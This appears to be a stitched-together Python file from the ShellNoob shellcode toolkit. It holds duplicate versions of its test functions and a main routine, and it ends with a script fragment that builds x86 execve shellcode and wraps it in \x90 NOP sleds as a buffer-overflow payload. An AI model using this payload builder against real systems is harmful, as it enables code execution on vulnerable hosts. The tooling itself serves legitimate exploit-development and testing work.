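def test_get_start_address():
    """Assemble the open-read-write sample to an executable and check its start address.

    Writes SECRET_STR to /tmp/secret (the fixed path the sample shellcode
    appears to read -- confirm against samples/), assembles the sample for
    the running kernel with ``--to-exe`` and asserts that
    ``ShellNoob.get_start_address`` reports a ``0x...`` hex address for the
    produced executable.  The build directory and the secret file are
    removed again, even when an assertion fails.

    Returns:
        ``(stdout, stderr, 0)`` -- the output of the shellnoob invocation and
        a zero status, in the shape the test runner expects.

    Raises:
        Exception: if the running kernel is neither Linux nor FreeBSD.
        AssertionError: if the conversion fails or the address is not hex.
    """
    stdout, stderr = '', ''

    tmp_dir = mkdtemp()
    asm_fp = join(tmp_dir, 'shellcode.asm')
    exe_fp = join(tmp_dir, 'shellcode.exe')
    # NOTE(review): fixed path in a shared, world-writable directory; it is
    # kept because the sample seems to hard-code it, so it cannot live in tmp_dir.
    secret_fp = '/tmp/secret'

    try:
        # Write the file directly instead of os.system('echo "..." > ...'):
        # no shell is involved, so SECRET_STR is never interpreted by one.
        with open(secret_fp, 'w') as secret_file:
            secret_file.write(SECRET_STR + '\n')

        kernel = ShellNoob.get_kernel()
        samples = {
            'Linux': 'samples/x86-linux/open-read-write.asm',
            'FreeBSD': 'samples/x86-freebsd/open-read-write.asm',
        }
        if kernel not in samples:
            raise Exception('testing on kernel %s not supported' % kernel)
        shutil.copyfile(join(dirname(__file__), samples[kernel]), asm_fp)

        _out, _err, _val = run_with_args('%s --to-exe' % asm_fp)
        stdout += _out
        stderr += _err
        assert _val == 0, 'shellnoob --to-exe exited with %s' % (_val,)

        snoob = ShellNoob()
        start_addr = snoob.get_start_address(exe_fp)
        assert re.match('0x[0-9a-f]+', start_addr), \
            'unexpected start address %r' % (start_addr,)
    finally:
        # Never leave the build directory or the secret file behind.
        shutil.rmtree(tmp_dir, ignore_errors=True)
        if os.path.exists(secret_fp):
            os.unlink(secret_fp)

    return stdout, stderr, 0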
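def test_get_start_address():
    """Check that ``get_start_address`` reports a hex address for a built sample.

    Steps: write SECRET_STR to /tmp/secret (the fixed path the sample
    shellcode appears to read -- confirm against samples/), copy the
    open-read-write sample for the running kernel into a fresh temp dir,
    assemble it with ``--to-exe`` and assert that
    ``ShellNoob.get_start_address`` returns a ``0x...`` string.  Temp dir and
    secret file are cleaned up in ``finally``, so a failing assertion does
    not leak them.

    Returns:
        ``(stdout, stderr, 0)`` -- accumulated shellnoob output and a zero
        status, as the test runner expects.

    Raises:
        Exception: if the running kernel is neither Linux nor FreeBSD.
        AssertionError: if the conversion fails or the address is not hex.
    """
    stdout, stderr = '', ''

    tmp_dir = mkdtemp()
    asm_fp = join(tmp_dir, 'shellcode.asm')
    exe_fp = join(tmp_dir, 'shellcode.exe')
    # NOTE(review): fixed path in a shared directory, kept because the sample
    # seems to hard-code it; it cannot be moved under tmp_dir from here.
    secret_fp = '/tmp/secret'

    sample_for_kernel = {
        'Linux': 'samples/x86-linux/open-read-write.asm',
        'FreeBSD': 'samples/x86-freebsd/open-read-write.asm',
    }

    try:
        # Plain file write rather than os.system('echo "%s" > %s'): the
        # secret never passes through a shell.
        with open(secret_fp, 'w') as secret_file:
            secret_file.write(SECRET_STR + '\n')

        kernel = ShellNoob.get_kernel()
        try:
            sample = sample_for_kernel[kernel]
        except KeyError:
            raise Exception('testing on kernel %s not supported' % kernel)
        shutil.copyfile(join(dirname(__file__), sample), asm_fp)

        _out, _err, _val = run_with_args('%s --to-exe' % asm_fp)
        stdout += _out
        stderr += _err
        assert _val == 0, 'shellnoob --to-exe exited with %s' % (_val,)

        snoob = ShellNoob()
        start_addr = snoob.get_start_address(exe_fp)
        assert re.match('0x[0-9a-f]+', start_addr), \
            'unexpected start address %r' % (start_addr,)
    finally:
        shutil.rmtree(tmp_dir, ignore_errors=True)
        if os.path.exists(secret_fp):
            os.unlink(secret_fp)

    return stdout, stderr, 0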
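def run_all_tests():
    """Run every test registered for the current kernel/hardware and print a summary.

    Tests are looked up in ``supported_features`` under ``'<kernel>#<hardware>'``.
    Each entry is ``(args, (stdout_re, stderr_re, retval))``; the test function
    is resolved by name from this module's globals and called with ``*args``.
    A test passes when its stdout and stderr match the expected patterns
    (``re.search``) and its return value equals the expected one.  An
    exception raised by one test is reported with its traceback and the run
    continues with the next test.  Exits with status 1 when no tests are
    registered for this setup.
    """
    kernel, hardware = ShellNoob.get_kernel(), ShellNoob.get_hardware()
    entry = '%s#%s' % (kernel, hardware)

    try:
        tests = supported_features[entry]
    except KeyError:
        print('ERROR: No tests for this setup "%s"' % entry)
        sys.exit(1)

    tot_test = 0
    ok_test = 0
    for test_name, entries in tests.items():
        for _input, expected in entries:
            tot_test += 1
            print('Running test %s - %s - %s' %
                  (test_name, _input, str(expected)))
            e_stdout, e_stderr, e_retval = expected
            try:
                # test_name comes from the in-module supported_features table,
                # not from user input, so a globals() lookup is acceptable here.
                stdout, stderr, retval = globals()[test_name](*_input)
                if not re.search(e_stdout, stdout):
                    print(RED + 'ERROR STDOUT %s != %s (expected)' %
                          (stdout, e_stdout) + ENDC)
                    continue
                if not re.search(e_stderr, stderr):
                    print(RED + 'ERROR STDERR %s != %s (expected)' %
                          (stderr, e_stderr) + ENDC)
                    continue
                if retval != e_retval:
                    print(RED + 'ERROR RETVAL %s != %s (expected)' %
                          (retval, e_retval) + ENDC)
                    continue
                print(GREEN + 'OK' + ENDC)
                ok_test += 1
            except Exception:
                # Broad on purpose: one broken test must not abort the run.
                print(RED + 'ERROR Exception while executing %s' % test_name +
                      ENDC)
                print(traceback.format_exc())
                print('---------------------------')

    if ok_test == tot_test:
        print(GREEN + '%s/%s OK' % (ok_test, tot_test) + ENDC)
    else:
        print(RED + '%s/%s ERROR' % (ok_test, tot_test) + ENDC)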
def main(argv):
    """Entry point: parse *argv*, dump the shellcode hex and report prohibited bytes.

    Args:
        argv: the full process argument vector; ``argv[0]`` is skipped.
    """
    opts = parser.parse_args(argv[1:])
    noob = ShellNoob(opts.is_64, opts.intel)

    code_hex = extract_hex_code(noob, opts.fmt, opts.fp)
    print_hex_dump(hex_dump(code_hex))

    findings = prohibited_bytes_analysis(
        noob, code_hex, opts.blacklist, opts.whitelist)
    print_prohibited_bytes_analysis(findings)
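def run_all_tests():
    """Run every test registered for the current kernel/hardware and print a summary.

    Tests are looked up in ``supported_features`` under ``'<kernel>#<hardware>'``.
    Each entry is ``(args, (stdout_re, stderr_re, retval))``; the test function
    is resolved by name from this module's globals and called with ``*args``.
    A test passes when its stdout and stderr match the expected patterns
    (``re.search``) and its return value equals the expected one.  An
    exception raised by one test is reported with its traceback and the run
    continues.  Exits with status 1 when no tests are registered for this
    setup.

    ``print`` is used in its single-argument call form, which behaves the
    same under Python 2 and Python 3.
    """
    kernel, hardware = ShellNoob.get_kernel(), ShellNoob.get_hardware()
    entry = '%s#%s' % (kernel, hardware)

    try:
        tests = supported_features[entry]
    except KeyError:
        print('ERROR: No tests for this setup "%s"' % entry)
        sys.exit(1)

    tot_test = 0
    ok_test = 0
    for test_name, entries in tests.items():
        for _input, expected in entries:
            tot_test += 1
            print('Running test %s - %s - %s' % (test_name, _input, str(expected)))
            e_stdout, e_stderr, e_retval = expected
            try:
                # test_name comes from the in-module supported_features table,
                # not from user input, so a globals() lookup is acceptable here.
                stdout, stderr, retval = globals()[test_name](*_input)
                if not re.search(e_stdout, stdout):
                    print(RED + 'ERROR STDOUT %s != %s (expected)' % (stdout, e_stdout) + ENDC)
                    continue
                if not re.search(e_stderr, stderr):
                    print(RED + 'ERROR STDERR %s != %s (expected)' % (stderr, e_stderr) + ENDC)
                    continue
                if retval != e_retval:
                    print(RED + 'ERROR RETVAL %s != %s (expected)' % (retval, e_retval) + ENDC)
                    continue
                print(GREEN + 'OK' + ENDC)
                ok_test += 1
            except Exception:
                # Broad on purpose: one broken test must not abort the run.
                print(RED + 'ERROR Exception while executing %s' % test_name + ENDC)
                print(traceback.format_exc())
                print('---------------------------')

    if ok_test == tot_test:
        print(GREEN + '%s/%s OK' % (ok_test, tot_test) + ENDC)
    else:
        print(RED + '%s/%s ERROR' % (ok_test, tot_test) + ENDC)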
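def test_conversion(with_breakpoint=False):
    """Exercise every shellnoob conversion on the open-read-write sample.

    Assembles the sample for the running kernel and converts it through the
    obj/exe/bin/hex/c/python/bash/pretty/safeasm targets -- from the .asm,
    from the assembled .obj, and again with ``-c`` -- checking that every
    invocation exits 0, that a bin -> hex -> obj -> hex -> bin round trip
    reproduces the original bytes, and that the final executable prints
    SECRET_STR.  The output of every invocation is accumulated and returned.
    The temp dir and the secret file are removed in ``finally``.

    Args:
        with_breakpoint: accepted for signature compatibility; unused here.

    Returns:
        ``(stdout, stderr, 0)`` with stdout stripped, as the test runner expects.

    Raises:
        Exception: if the running kernel is neither Linux nor FreeBSD.
        AssertionError: if any conversion fails or an output does not match.
    """
    out_parts = []
    err_parts = []

    def convert(args):
        """Run shellnoob with *args*, collect its output and require exit 0."""
        _out, _err, _val = run_with_args(args)
        out_parts.append(_out)
        err_parts.append(_err)
        assert _val == 0, 'shellnoob %s exited with %s' % (args, _val)

    tmp_dir = mkdtemp()
    asm_fp = join(tmp_dir, 'shellcode.asm')
    asm2_fp = join(tmp_dir, 'shellcode2.asm')
    obj_fp = join(tmp_dir, 'shellcode.obj')
    exe_fp = join(tmp_dir, 'shellcode.exe')
    bin_fp = join(tmp_dir, 'shellcode.bin')
    bin2_fp = join(tmp_dir, 'shellcode2.bin')
    hex_fp = join(tmp_dir, 'shellcode.hex')
    # NOTE(review): fixed path in a shared, world-writable directory; kept
    # because the sample seems to hard-code it, so it cannot live in tmp_dir.
    secret_fp = '/tmp/secret'

    samples = {
        'Linux': 'samples/x86-linux/open-read-write.asm',
        'FreeBSD': 'samples/x86-freebsd/open-read-write.asm',
    }
    targets = ('obj', 'exe', 'bin', 'hex', 'c', 'python', 'bash', 'pretty', 'safeasm')

    try:
        # Write the secret directly rather than via os.system('echo ... > ...'):
        # no shell is involved, so SECRET_STR is never interpreted by one.
        with open(secret_fp, 'w') as secret_file:
            secret_file.write(SECRET_STR + '\n')

        kernel = ShellNoob.get_kernel()
        if kernel not in samples:
            raise Exception('testing on kernel %s not supported' % kernel)
        shutil.copyfile(join(dirname(__file__), samples[kernel]), asm_fp)

        # Round trip asm -> bin -> hex -> obj -> hex -> bin2: bin and bin2
        # must be byte-identical.
        convert('%s --to-bin' % asm_fp)
        convert('%s --to-hex' % bin_fp)
        convert('%s --to-obj' % hex_fp)
        convert('%s --to-hex' % obj_fp)
        convert('%s --to-bin %s' % (hex_fp, bin2_fp))
        with open(bin_fp, 'rb') as first, open(bin2_fp, 'rb') as second:
            assert first.read() == second.read(), \
                'bin -> hex -> bin round trip changed the bytes'

        # Every target from the .asm source.
        for target in targets:
            convert('%s --to-%s' % (asm_fp, target))

        # Every target from the assembled object; the asm target needs an
        # explicit output path here.
        convert('%s --to-asm %s' % (obj_fp, asm2_fp))
        for target in targets[1:]:
            convert('%s --to-%s' % (obj_fp, target))

        # Every target from the source again, with -c.
        for target in targets:
            convert('-c %s --to-%s' % (asm_fp, target))

        # TODO add "chain" tests

        # Build and run the executable: its output must be SECRET_STR
        # (presumably read back from secret_fp -- confirm against the sample).
        convert('%s --to-exe' % asm_fp)
        with os.popen(exe_fp) as proc:
            assert proc.read().rstrip() == SECRET_STR
        print('Output of the shellcode matches!')
    finally:
        shutil.rmtree(tmp_dir, ignore_errors=True)
        if os.path.exists(secret_fp):
            os.unlink(secret_fp)

    return ''.join(out_parts).strip(), ''.join(err_parts), 0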
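def test_conversion(with_breakpoint=False):
    """Exercise every shellnoob conversion on the open-read-write sample.

    Assembles the sample for the running kernel and converts it through the
    obj/exe/bin/hex/c/python/bash/pretty/safeasm targets -- from the .asm,
    from the assembled .obj, and again with ``-c`` -- checking that every
    invocation exits 0, that a bin -> hex -> obj -> hex -> bin round trip
    reproduces the original bytes, and that the final executable prints
    SECRET_STR.  The output of every invocation is accumulated and returned.
    The temp dir and the secret file are removed in ``finally``.

    Only syntax valid under both Python 2 and 3 is used (single-argument
    ``print(...)``, list accumulation instead of ``nonlocal``).

    Args:
        with_breakpoint: accepted for signature compatibility; unused here.

    Returns:
        ``(stdout, stderr, 0)`` as the test runner expects.

    Raises:
        Exception: if the running kernel is neither Linux nor FreeBSD.
        AssertionError: if any conversion fails or an output does not match.
    """
    collected_out = []
    collected_err = []

    def run_step(args):
        """Invoke shellnoob with *args*, keep its output, require exit status 0."""
        step_out, step_err, step_val = run_with_args(args)
        collected_out.append(step_out)
        collected_err.append(step_err)
        assert step_val == 0, 'shellnoob %s exited with %s' % (args, step_val)

    tmp_dir = mkdtemp()
    asm_fp = join(tmp_dir, 'shellcode.asm')
    asm2_fp = join(tmp_dir, 'shellcode2.asm')
    obj_fp = join(tmp_dir, 'shellcode.obj')
    exe_fp = join(tmp_dir, 'shellcode.exe')
    bin_fp = join(tmp_dir, 'shellcode.bin')
    bin2_fp = join(tmp_dir, 'shellcode2.bin')
    hex_fp = join(tmp_dir, 'shellcode.hex')
    # NOTE(review): fixed path in a shared, world-writable directory; kept
    # because the sample seems to hard-code it, so it cannot live in tmp_dir.
    secret_fp = '/tmp/secret'

    sample_for_kernel = {
        'Linux': 'samples/x86-linux/open-read-write.asm',
        'FreeBSD': 'samples/x86-freebsd/open-read-write.asm',
    }
    targets = ('obj', 'exe', 'bin', 'hex', 'c', 'python', 'bash', 'pretty', 'safeasm')

    try:
        # Plain file write rather than os.system('echo "%s" > /tmp/secret'):
        # the secret never passes through a shell.
        with open(secret_fp, 'w') as secret_file:
            secret_file.write(SECRET_STR + '\n')

        kernel = ShellNoob.get_kernel()
        try:
            sample = sample_for_kernel[kernel]
        except KeyError:
            raise Exception('testing on kernel %s not supported' % kernel)
        shutil.copyfile(join(dirname(__file__), sample), asm_fp)

        # Round trip asm -> bin -> hex -> obj -> hex -> bin2; bin and bin2
        # must be byte-identical.
        run_step('%s --to-bin' % asm_fp)
        run_step('%s --to-hex' % bin_fp)
        run_step('%s --to-obj' % hex_fp)
        run_step('%s --to-hex' % obj_fp)
        run_step('%s --to-bin %s' % (hex_fp, bin2_fp))
        with open(bin_fp, 'rb') as first, open(bin2_fp, 'rb') as second:
            assert first.read() == second.read(), \
                'bin -> hex -> bin round trip changed the bytes'

        # Every target from the .asm source.
        for target in targets:
            run_step('%s --to-%s' % (asm_fp, target))

        # Every target from the assembled object; the asm target needs an
        # explicit output path here.
        run_step('%s --to-asm %s' % (obj_fp, asm2_fp))
        for target in targets[1:]:
            run_step('%s --to-%s' % (obj_fp, target))

        # Every target from the source again, with -c.
        for target in targets:
            run_step('-c %s --to-%s' % (asm_fp, target))

        # TODO add "chain" tests

        # Build and run the executable: its output must be SECRET_STR
        # (presumably read back from secret_fp -- confirm against the sample).
        run_step('%s --to-exe' % asm_fp)
        with os.popen(exe_fp) as proc:
            assert proc.read().rstrip() == SECRET_STR
        print('Output of the shellcode matches!')
    finally:
        shutil.rmtree(tmp_dir, ignore_errors=True)
        if os.path.exists(secret_fp):
            os.unlink(secret_fp)

    return ''.join(collected_out), ''.join(collected_err), 0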
# Script fragment: hex_code, final_str, str, shell_code, to_range, from_range
# and argv are all bound earlier in the script, outside this excerpt.
# NOTE(review): `str` is used as a plain accumulator variable here and
# shadows the builtin; renaming it (e.g. to `chunk`) would avoid surprises.

# Emit one `push $0x...` line per 8 hex digits (4 bytes) of hex_code; the
# trailing partial group is flushed after the loop.
for count in range(len(hex_code)):
    if count > 0 and count % 8 == 0:
        final_str += "push $0x%s \n" % str
        str = ""
    str += hex_code[count]
final_str += "push $0x%s \n" % str

# Append the fixed AT&T-syntax tail: two `int $0x80` system calls, with
# %al set to 11 and then to 1.
# NOTE(review): the implicit literal concatenation binds tighter than the
# `+`, so `.encode("utf-8")` applies only to the literal, not to final_str.
# That is harmless under Python 2 (str.encode returns str) but under
# Python 3 it yields bytes and the `+` would raise TypeError -- this
# fragment relies on Python 2 semantics.
shell_code += final_str + "movl %esp,%ebx\npush %eax\n" \
        "push %ebx\nmov %esp, %ecx\nmovl %eax, %edx\nmov $11,%al\nint $0x80\nxor %eax,%eax\nmov $1,%al" \
        "\nxor %ebx,%ebx\nint $0x80".encode("utf-8")

# output_file = open("shell.asm", "w")
# output_file.write(shell_code)
# output_file.close()

# Assemble the generated AT&T source (flag_intel=False) back into a hex string.
sn = ShellNoob(flag_intel=False)
hex_code = sn.asm_to_hex(shell_code)

# Re-render hex_code as a "\xNN\xNN..." escaped string: a "\\x" prefix is
# inserted before every pair of hex digits.
# NOTE(review): `i % 2 is 0` compares by identity and only works because
# CPython caches small ints; it should be `i % 2 == 0`.
hc = "\\x"
for i in range(0, len(hex_code)):
    if i > 0 and i % 2 is 0:
        hc += "\\x"

    hc += hex_code[i]

# hc.count('x') is the byte count of hc (one 'x' per "\\x" prefix; hex
# digits never contain 'x').  What to_range / from_range measure is not
# visible in this excerpt -- presumably a byte budget; confirm upstream.
diff = to_range - from_range - hc.count('x')

for i in range(0, 6):
    hc = i * "\\x90" + (diff / 2 * "\\x90") + hc + (diff / 2 *
                                                    argv[2].decode())